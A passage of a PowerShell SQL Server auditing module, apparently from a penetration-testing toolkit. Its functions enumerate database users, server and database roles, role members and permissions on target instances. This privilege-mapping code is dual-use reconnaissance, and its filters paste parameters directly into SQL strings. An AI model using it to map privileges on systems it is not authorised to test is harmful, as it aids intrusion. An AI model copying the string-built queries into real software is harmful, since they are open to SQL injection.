USE $DbName;\n                SELECT  '$ComputerName' as [ComputerName],\n                '$Instance' as [Instance],\n                '$DbName' as [DatabaseName],\n                rp.name as [PrincipalName],\n                rp.type_desc as [PrincipalType],\n                pm.class_desc as [PermissionType],\n                pm.permission_name as [PermissionName],\n                pm.state_desc as [StateDescription],\n                ObjectType = CASE\n                WHEN obj.type_desc IS NULL\n                OR obj.type_desc = 'SYSTEM_TABLE' THEN\n                pm.class_desc\n                ELSE\n                obj.type_desc\n                END,\n                [ObjectName] = Isnull(ss.name, Object_name(pm.major_id))\n                FROM   $DbName.sys.database_principals rp\n                INNER JOIN $DbName.sys.database_permissions pm\n                ON pm.grantee_principal_id = rp.principal_id\n                LEFT JOIN $DbName.sys.schemas ss\n                ON pm.major_id = ss.schema_id\n                LEFT JOIN $DbName.sys.objects obj\n                ON pm.[major_id] = obj.[object_id] WHERE 1=1\n                $PermissionTypeFilter\n                $PermissionNameFilter\n            $PrincipalNameFilter\"\n\n            # Execute Query\n            if(-not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Grabbing permissions for the $DbName database...\"\n            }\n\n            $TblDatabaseTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n\n            # Append results\n            $TblDatabasePrivs = $TblDatabasePrivs + $TblDatabaseTemp\n        }\n    }\n\n    End\n    {\n        # Return data\n        $TblDatabasePrivs\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLDatabaseUser\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLDatabaseUser\n{\n    <#\n            .SYNOPSIS\n            Returns database user information from target SQL Servers.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER DAC\n            Connect using Dedicated Admin Connection.\n            .PARAMETER DatabaseName\n            Database name to filter for.\n            .PARAMETER DatabaseUser\n            Database user to filter for.\n            .PARAMETER PrincipalName\n            Principal name to filter for.\n            .PARAMETER NoDefaults\n            Only show information for non default databases.\n\n            .EXAMPLE\n            PS C:\\> Get-SQLDatabaseUser -Instance SQLServer1\\STANDARDDEV2014 -DatabaseName testdb -PrincipalName evil\n\n            ComputerName       : SQLServer1\n            Instance           : SQLServer1\\STANDARDDEV2014\n            DatabaseName       : testdb\n            DatabaseUserId     : 5\n            DatabaseUser       : evil\n            PrincipalSid       : 3E26CA9124B4AE42ABF1BBF2523738CA\n            PrincipalName      : evil\n            PrincipalType      : SQL_USER\n            deault_schema_name : dbo\n            create_date        : 04/22/2016 13:00:33\n            is_fixed_role      : False\n            [TRUNCATED]\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceLocal | Get-SQLDatabaseUser -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server database name.')]\n        [string]$DatabaseName,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Database user.')]\n        [string]$DatabaseUser,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Server login.')]\n        [string]$PrincipalName,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Do not show database users associated with default databases.')]\n        [Switch]$NoDefaults,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblDatabaseUsers = New-Object -TypeName System.Data.DataTable\n        $null = $TblDatabaseUsers.Columns.Add('ComputerName')\n        $null = $TblDatabaseUsers.Columns.Add('Instance')\n        $null = $TblDatabaseUsers.Columns.Add('DatabaseName')\n        $null = $TblDatabaseUsers.Columns.Add('DatabaseUserId')\n        $null = $TblDatabaseUsers.Columns.Add('DatabaseUser')\n        $null = $TblDatabaseUsers.Columns.Add('PrincipalSid')\n        $null = $TblDatabaseUsers.Columns.Add('PrincipalName')\n        $null = $TblDatabaseUsers.Columns.Add('PrincipalType')\n        $null = $TblDatabaseUsers.Columns.Add('deault_schema_name')\n        $null = $TblDatabaseUsers.Columns.Add('create_date')\n        $null = $TblDatabaseUsers.Columns.Add('is_fixed_role')\n\n        # Setup PrincipalName filter\n        if($PrincipalName)\n        {\n            $PrincipalNameFilter = \" and b.name like '$PrincipalName'\"\n        }\n        else\n        {\n            $PrincipalNameFilter = ''\n        }\n\n        # Setup DatabaseUser filter\n        if($DatabaseUser)\n        {\n            $DatabaseUserFilter = \" and a.name like '$DatabaseUser'\"\n        }\n        else\n        {\n            $DatabaseUserFilter = ''\n        }\n    }\n\n    Process\n    {\n        # Note: Tables queried by this function typically require sysadmin or DBO privileges.\n\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n\n        # Test connection to instance\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if($TestConnection)\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"\n            }\n        }\n        else\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n            }\n            return\n        }\n\n        # Get list of databases\n        if($NoDefaults)\n        {\n            $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -SuppressVerbose  -NoDefaults\n        }\n        else\n        {\n            $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -SuppressVerbose\n        }\n\n        # Get the privs for each database\n        $TblDatabases |\n        ForEach-Object -Process {\n            # Set DatabaseName filter\n            $DbName = $_.DatabaseName\n\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Grabbing database users from $DbName.\"\n            }\n\n            # Define Query\n            $Query = \"  USE $DbName;\n                SELECT  '$ComputerName' as [ComputerName],\n                '$Instance' as [Instance],\n                '$DbName' as [DatabaseName],\n                a.principal_id as [DatabaseUserId],\n                a.name as [DatabaseUser],\n                a.sid as [PrincipalSid],\n                b.name as [PrincipalName],\n                a.type_desc as [PrincipalType],\n                default_schema_name,\n                a.create_date,\n                a.is_fixed_role\n                FROM    [sys].[database_principals] a\n                LEFT JOIN [sys].[server_principals] b\n                ON a.sid = b.sid WHERE 1=1\n                $DatabaseUserFilter\n            $PrincipalNameFilter\"\n\n            # Execute Query\n            $TblDatabaseUsersTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n\n            # Update sid formatting for each entry and append results\n            $TblDatabaseUsersTemp |\n            ForEach-Object -Process {\n                # Convert SID to string\n                if($_.PrincipalSid.GetType() -eq [System.DBNull])\n                {\n                    $Sid = ''\n                }\n                else\n                {\n                    # Format principal sid\n                    $NewSid = [System.BitConverter]::ToString($_.PrincipalSid).Replace('-','')\n                    if ($NewSid.length -le 10)\n                    {\n                        $Sid = [Convert]::ToInt32($NewSid,16)\n                    }\n                    else\n                    {\n                        $Sid = $NewSid\n                    }\n                }\n\n                # Add results to table\n                $null = $TblDatabaseUsers.Rows.Add(\n                    [string]$_.ComputerName,\n                    [string]$_.Instance,\n                    [string]$_.DatabaseName,\n                    [string]$_.DatabaseUserId,\n                    [string]$_.DatabaseUser,\n                    $Sid,\n                    [string]$_.PrincipalName,\n                    [string]$_.PrincipalType,\n                    [string]$_.default_schema_name,\n                    [string]$_.create_date,\n                [string]$_.is_fixed_role)\n            }\n        }\n    }\n\n    End\n    {\n        # Return data\n        $TblDatabaseUsers\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLServerRole\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLServerRole\n{\n    <#\n            .SYNOPSIS\n            Returns SQL Server role information from target SQL Servers.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER RolePrincipalName\n            Role principal name to filter for.\n            .PARAMETER RoleOwner\n            Role owner name to filter for.\n            .EXAMPLE\n            PS C:\\> Get-SQLServerRole -Instance SQLServer1\\STANDARDDEV2014 | Select-Object -First 1\n\n            ComputerName          : SQLServer1\n            Instance              : SQLServer1\\STANDARDDEV2014\n            RolePrincipalId       : 2\n            RolePrincipalSid      : 2\n            RolePrincipalName     : public\n            RolePrincipalType     : SERVER_ROLE\n            OwnerPrincipalId      : 1\n            OwnerPrincipalName    : sa\n            is_disabled           : False\n            is_fixed_role         : False\n            create_date           : 4/13/2009 12:59:06 PM\n            modify_Date           : 4/13/2009 12:59:06 PM\n            default_database_name :\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceLocal | Get-SQLServerRole -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Role name.')]\n        [string]$RolePrincipalName,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = \"Role owner's name.\")]\n        [string]$RoleOwner,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Setup table for output\n        $TblServerRoles = New-Object -TypeName System.Data.DataTable\n        $null = $TblServerRoles.Columns.Add('ComputerName')\n        $null = $TblServerRoles.Columns.Add('Instance')\n        $null = $TblServerRoles.Columns.Add('RolePrincipalId')\n        $null = $TblServerRoles.Columns.Add('RolePrincipalSid')\n        $null = $TblServerRoles.Columns.Add('RolePrincipalName')\n        $null = $TblServerRoles.Columns.Add('RolePrincipalType')\n        $null = $TblServerRoles.Columns.Add('OwnerPrincipalId')\n        $null = $TblServerRoles.Columns.Add('OwnerPrincipalName')\n        $null = $TblServerRoles.Columns.Add('is_disabled')\n        $null = $TblServerRoles.Columns.Add('is_fixed_role')\n        $null = $TblServerRoles.Columns.Add('create_date')\n        $null = $TblServerRoles.Columns.Add('modify_Date')\n        $null = $TblServerRoles.Columns.Add('default_database_name')\n\n        # Setup owner filter\n        if ($RoleOwner)\n        {\n            $RoleOwnerFilter = \" AND suser_name(owning_principal_id) like '$RoleOwner'\"\n        }\n        else\n        {\n            $RoleOwnerFilter = ''\n        }\n\n        # Setup role name\n        if ($RolePrincipalName)\n        {\n            $PrincipalNameFilter = \" AND name like '$RolePrincipalName'\"\n        }\n        else\n        {\n            $PrincipalNameFilter = ''\n        }\n    }\n\n    Process\n    {\n        # Note: Tables queried by this function typically require sysadmin privileges to get all rows\n\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Test connection to instance\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if($TestConnection)\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"\n            }\n        }\n        else\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n            }\n            return\n        }\n\n        # Define Query\n        $Query = \"SELECT   '$ComputerName' as [ComputerName],\n            '$Instance' as [Instance],\n            principal_id as [RolePrincipalId],\n            sid as [RolePrincipalSid],\n            name as [RolePrincipalName],\n            type_desc as [RolePrincipalType],\n            owning_principal_id as [OwnerPrincipalId],\n            suser_name(owning_principal_id) as [OwnerPrincipalName],\n            is_disabled,\n            is_fixed_role,\n            create_date,\n            modify_Date,\n            default_database_name\n            FROM [master].[sys].[server_principals] WHERE type like 'R'\n            $PrincipalNameFilter\n        $RoleOwnerFilter\"\n\n        # Execute Query\n        $TblServerRolesTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n\n        # Update sid formatting for each entry\n        $TblServerRolesTemp |\n        ForEach-Object -Process {\n            # Format principal sid\n            $NewSid = [System.BitConverter]::ToString($_.RolePrincipalSid).Replace('-','')\n            if ($NewSid.length -le 10)\n            {\n                $Sid = [Convert]::ToInt32($NewSid,16)\n            }\n            else\n            {\n                $Sid = $NewSid\n            }\n\n            # Add results to table\n            $null = $TblServerRoles.Rows.Add(\n                [string]$_.ComputerName,\n                [string]$_.Instance,\n                [string]$_.RolePrincipalId,\n                $Sid,\n                $_.RolePrincipalName,\n                [string]$_.RolePrincipalType,\n                [string]$_.OwnerPrincipalId,\n                [string]$_.OwnerPrincipalName,\n                [string]$_.is_disabled,\n                [string]$_.is_fixed_role,\n                $_.create_date,\n                $_.modify_Date,\n            [string]$_.default_database_name)\n        }\n    }\n\n    End\n    {\n        # Return data\n        $TblServerRoles\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLServerRoleMember\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLServerRoleMember\n{\n    <#\n            .SYNOPSIS\n            Returns SQL Server role member information from target SQL Servers.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER RolePrincipalName\n            Role principal name to filter for.\n            .PARAMETER PrincipalName\n            Principal name to filter for.\n            .EXAMPLE\n            PS C:\\> Get-SQLServerRoleMember -Instance SQLServer1\\STANDARDDEV2014 -PrincipalName MyUser\n\n            ComputerName      : SQLServer1\n            Instance          : SQLServer1\\STANDARDDEV2014\n            RolePrincipalId   : 3\n            RolePrincipalName : sysadmin\n            PrincipalId       : 272\n            PrincipalName     : MyUser\n\n            ComputerName      : SQLServer1\n            Instance          : SQLServer1\\STANDARDDEV2014\n            RolePrincipalId   : 6\n            RolePrincipalName : setupadmin\n            PrincipalId       : 272\n            PrincipalName     : MyUser\n\n            ComputerName      : SQLServer1\n            Instance          : SQLServer1\\STANDARDDEV2014\n            RolePrincipalId   : 276\n            RolePrincipalName : MyCustomRole\n            PrincipalId       : 272\n            PrincipalName     : MyUser\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceLocal | Get-SQLServerRoleMember -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Role name.')]\n        [string]$RolePrincipalName,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL login or Windows account name.')]\n        [string]$PrincipalName,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblServerRoleMembers = New-Object -TypeName System.Data.DataTable\n\n        # Setup role name filter\n        if ($RolePrincipalName)\n        {\n            $RoleOwnerFilter = \" AND SUSER_NAME(role_principal_id) like '$RolePrincipalName'\"\n        }\n        else\n        {\n            $RoleOwnerFilter = ''\n        }\n\n        # Setup login name filter\n        if ($PrincipalName)\n        {\n            $PrincipalNameFilter = \" AND SUSER_NAME(member_principal_id) like '$PrincipalName'\"\n        }\n        else\n        {\n            $PrincipalNameFilter = ''\n        }\n    }\n\n    Process\n    {\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Test connection to instance\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if($TestConnection)\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"\n            }\n        }\n        else\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n            }\n            return\n        }\n\n        # Define Query\n        $Query = \"  SELECT  '$ComputerName' as [ComputerName],\n            '$Instance' as [Instance],role_principal_id as [RolePrincipalId],\n            SUSER_NAME(role_principal_id) as [RolePrincipalName],\n            member_principal_id as [PrincipalId],\n            SUSER_NAME(member_principal_id) as [PrincipalName]\n            FROM sys.server_role_members WHERE 1=1\n            $PrincipalNameFilter\n        $RoleOwnerFilter\"\n\n        # Execute Query\n        $TblServerRoleMembersTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n\n        # Append as needed\n        $TblServerRoleMembers = $TblServerRoleMembers + $TblServerRoleMembersTemp\n    }\n\n    End\n    {\n        # Return role members\n        $TblServerRoleMembers\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLDatabaseRole\n# ----------------------------------\n# Author: Scott Sutherland\n# Reference: https://technet.microsoft.com/en-us/library/ms189612(v=sql.105).aspx\nFunction  Get-SQLDatabaseRole\n{\n    <#\n            .SYNOPSIS\n            Returns database role information from target SQL Servers.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER DAC\n            Connect using Dedicated Admin Connection.\n            .PARAMETER DatabaseName\n            Database name to filter for.\n            .PARAMETER NoDefaults\n            Only select non default databases.\n            .PARAMETER RolePrincipalName\n            Role principalname to filter for.\n            .PARAMETER RoleOwner\n            Role owner's name to filter for.\n\n            .EXAMPLE\n            PS C:\\> Get-SQLDatabaseRole -Instance SQLServer1\\STANDARDDEV2014 -DatabaseName testdb -RolePrincipalName DB_OWNER\n\n            ComputerName        : SQLServer1\n            Instance            : SQLServer1\\STANDARDDEV2014\n            DatabaseName        : testdb\n            RolePrincipalId     : 16384\n            RolePrincipalSid    : 01050000000000090400000000000000000000000000000000400000\n            RolePrincipalName   : db_owner\n            RolePrincipalType   : DATABASE_ROLE\n            OwnerPrincipalId    : 1\n            OwnerPrincipalName  : sa\n            is_fixed_role       : True\n            create_date         : 4/8/2003 9:10:42 AM\n            modify_Date         : 4/13/2009 12:59:14 PM\n            default_schema_name :\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceLocal | Get-SQLDatabaseRole -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server database name.')]\n        [string]$DatabaseName,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Role name.')]\n        [string]$RolePrincipalName,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = \"Role owner's name.\")]\n        [string]$RoleOwner,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Only select non default databases.')]\n        [switch]$NoDefaults,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Setup table for output\n        $TblDatabaseRoles = New-Object -TypeName System.Data.DataTable\n        $null = $TblDatabaseRoles.Columns.Add('ComputerName')\n        $null = $TblDatabaseRoles.Columns.Add('Instance')\n        $null = $TblDatabaseRoles.Columns.Add('DatabaseName')\n        $null = $TblDatabaseRoles.Columns.Add('RolePrincipalId')\n        $null = $TblDatabaseRoles.Columns.Add('RolePrincipalSid')\n        $null = $TblDatabaseRoles.Columns.Add('RolePrincipalName')\n        $null = $TblDatabaseRoles.Columns.Add('RolePrincipalType')\n        $null = $TblDatabaseRoles.Columns.Add('OwnerPrincipalId')\n        $null = $TblDatabaseRoles.Columns.Add('OwnerPrincipalName')\n        $null = $TblDatabaseRoles.Columns.Add('is_fixed_role')\n        $null = $TblDatabaseRoles.Columns.Add('create_date')\n        $null = $TblDatabaseRoles.Columns.Add('modify_Date')\n        $null = $TblDatabaseRoles.Columns.Add('default_schema_name')\n\n        # Setup RoleOwner filter\n        if ($RoleOwner)\n        {\n            $RoleOwnerFilter = \" AND suser_name(owning_principal_id) like '$RoleOwner'\"\n        }\n        else\n        {\n            $RoleOwnerFilter = ''\n        }\n\n        # Setup RolePrincipalName filter\n        if ($RolePrincipalName)\n        {\n            $RolePrincipalNameFilter = \" AND name like '$RolePrincipalName'\"\n        }\n        else\n        {\n            $RolePrincipalNameFilter = ''\n        }\n    }\n\n    Process\n    {\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Test connection to instance\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if($TestConnection)\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"\n            }\n        }\n        else\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n            }\n            return\n        }\n\n        # Get list of databases\n        if($NoDefaults)\n        {\n            $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -SuppressVerbose -NoDefaults\n        }\n        else\n        {\n            $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -SuppressVerbose\n        }\n\n        # Get role for each database\n        $TblDatabases |\n        ForEach-Object -Process {\n            # Get database name\n            $DbName = $_.DatabaseName\n\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Getting roles from the $DbName database.\"\n            }\n\n            # Define Query\n            $Query = \"  USE $DbName;\n                SELECT  '$ComputerName' as [ComputerName],\n                '$Instance' as [Instance],\n                '$DbName' as [DatabaseName],\n                principal_id as [RolePrincipalId],\n                sid as [RolePrincipalSid],\n                name as [RolePrincipalName],\n                type_desc as [RolePrincipalType],\n                owning_principal_id as [OwnerPrincipalId],\n                suser_name(owning_principal_id) as [OwnerPrincipalName],\n                is_fixed_role,\n                create_date,\n                modify_Date,\n                default_schema_name\n                FROM [$DbName].[sys].[database_principals]\n                WHERE type like 'R'\n                $RolePrincipalNameFilter\n            $RoleOwnerFilter\"\n\n            # Execute Query\n            $TblDatabaseRolesTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n\n            # Update sid formatting for each entry and append results\n            $TblDatabaseRolesTemp |\n            ForEach-Object -Process {\n                # Format principal sid\n                $NewSid = [System.BitConverter]::ToString($_.RolePrincipalSid).Replace('-','')\n                if ($NewSid.length -le 10)\n                {\n                    $Sid = [Convert]::ToInt32($NewSid,16)\n                }\n                else\n                {\n                    $Sid = $NewSid\n                }\n\n                # Add results to table\n                $null = $TblDatabaseRoles.Rows.Add(\n                    [string]$_.ComputerName,\n                    [string]$_.Instance,\n                    [string]$_.DatabaseName,\n                    [string]$_.RolePrincipalId,\n                    $Sid,\n                    $_.RolePrincipalName,\n                    [string]$_.RolePrincipalType,\n                    [string]$_.OwnerPrincipalId,\n                    [string]$_.OwnerPrincipalName,\n                    [string]$_.is_fixed_role,\n                    $_.create_date,\n                    $_.modify_Date,\n                [string]$_.default_schema_name)\n            }\n        }\n    }\n\n    End\n    {\n        # Return data\n        $TblDatabaseRoles\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLDatabaseRoleMember\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLDatabaseRoleMember\n{\n    <#\n            .SYNOPSIS\n            Returns database role member information from target SQL Servers.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER DAC\n            Connect using Dedicated Admin Connection.\n            .PARAMETER DatabaseName\n            Database name to filter for.\n            .PARAMETER RolePrincipalName\n            Role principalname to filter for.\n            .PARAMETER PrincipalName\n            Name of principal or Role to filter for.\n\n            .EXAMPLE\n            PS C:\\> Get-SQLDatabaseRoleMember -Instance SQLServer1\\STANDARDDEV2014 -DatabaseName testdb -PrincipalName evil\n\n            ComputerName      : SQLServer1\n            Instance          : SQLServer1\\STANDARDDEV2014\n            DatabaseName      : testdb\n            RolePrincipalId   : 16387\n            RolePrincipalName : db_ddladmin\n            PrincipalId       : 5\n            PrincipalName     : evil\n\n            ComputerName      : SQLServer1\n            Instance          : SQLServer1\\STANDARDDEV2014\n            DatabaseName      : testdb\n            RolePrincipalId   : 16391\n            RolePrincipalName : db_datawriter\n            PrincipalId       : 5\n            PrincipalName     : evil\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceLocal | Get-SQLDatabaseRoleMember -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server database name.')]\n        [string]$DatabaseName,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Role name.')]\n        [string]$RolePrincipalName,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL login or Windows account name.')]\n        [string]$PrincipalName,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Only select non default databases.')]\n        [switch]$NoDefaults,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblDatabaseRoleMembers = New-Object -TypeName 